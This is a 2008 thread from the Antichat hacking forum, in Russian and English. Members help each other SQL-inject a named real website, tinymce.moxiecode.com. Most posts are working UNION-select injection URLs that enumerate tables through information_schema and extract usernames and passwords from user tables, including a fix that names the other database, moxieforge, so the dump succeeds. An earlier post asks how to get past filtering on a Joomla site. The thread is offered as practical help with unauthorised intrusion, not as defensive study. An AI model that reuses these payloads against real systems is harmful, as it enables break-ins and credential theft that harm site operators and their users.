ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
05.10.2008, 02:47
|
|
Новичок
Регистрация: 25.04.2007
Сообщений: 16
Провел на форуме:
110445
Репутация:
1
|
|
http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7 &Itemid=31
how to inject this
i tried after
http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7 '&Itemid=31
and
http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7 &Itemid=31'
doesnt work is this filtered how to bybass
waitting.............................
|
|
|
05.10.2008, 11:47
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
geforce, тебе тут никто ничего не должен
|
|
|
|
05.10.2008, 14:01
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
Народ вот такая проблема
Сайт:http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat (version(),0x3a,database(),0x3a,user()),8/*
Дальше роем и находим таблицы
user
-user_name
-user_password
tbl_user
-u_username
-u_password
-u_email
punbb_users
-id
-username
-password
-email
составляем запросы
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,u_username,u_password),8+from+tbl_user+limit+1,1/*
и
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+punbb_users+limit+1,1/*
Но сайт упорно не хочет показывать содержимое таблиц
что делать чтобы оно показало? |
|
|
|
05.10.2008, 14:12
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
Там таблицы те лежат просто в другой БД
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,u_username,u_password),8+from+moxieforge.tbl_user+limit+1,1/*
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
05.10.2008, 14:31
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от l-l00K
Там таблицы те лежат просто в другой БД
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,u_username,u_password),8+from+moxieforge.tbl_user+limit+1,1/*
Попробу сначало посмотреть что там вобще имеется
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,table_ name,8+from+information_schema.tables/**/
|
|
|
|
05.10.2008, 14:32
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
1)Для тугих будешь вопросы повторять в другом месте.
2)За это время уже и сам мог баги поискать. Или на других форумах.
3)Спайдер не девушка.
|
|
|
|
05.10.2008, 14:35
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от iddqd
1)Для тугих будешь вопросы повторять в другом месте.
2)За это время уже и сам мог баги поискать. Или на других форумах.
3)Спайдер не девушка.
1) Меня спросили я ответил!
2) Поискал не беспокойся!
3) Учту! (Аватар интересный  )
|
|
|
|
05.10.2008, 14:52
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
Сообщение от geforce
Попробу сначало посмотреть что там вобще имеется
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,table_ name,8+from+information_schema.tables/**/
А по твоему откуда Мистерео название таблиц чуть выше отписал? Но при твоем запросе выводятся все таблицы, к которым пользователь имеет доступ, но при этом не выводится название БД, вот и получается что, если какая-то из этих таблиц лежит не в той БД, что на данный момент выбрана, то без указания имени базы данных перед именем той таблицы, ты данных не получишь
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
Последний раз редактировалось l-l00K; 05.10.2008 в 14:59..
|
|
|
|
05.10.2008, 14:58
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от l-l00K
А по твоему откуда Мистерео название таблиц чуть выше отписал? Но при твоем запросе выводятся все таблицы, к которым пользователь имеет доступ, но при этом не выводится название БД, вот и получается что, если какая-то из этих таблиц лежит не в той БД, что на данный момент выбрана, то без указания имени базы данных перед именем таблицы, ты данных не получишь
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,databa se(),8/**/
Название бд tinymce!
|
|
|
|
05.10.2008, 15:00
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
Название текущей БД tinymce, а БД где лежит tbl_user называется moxieforge
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
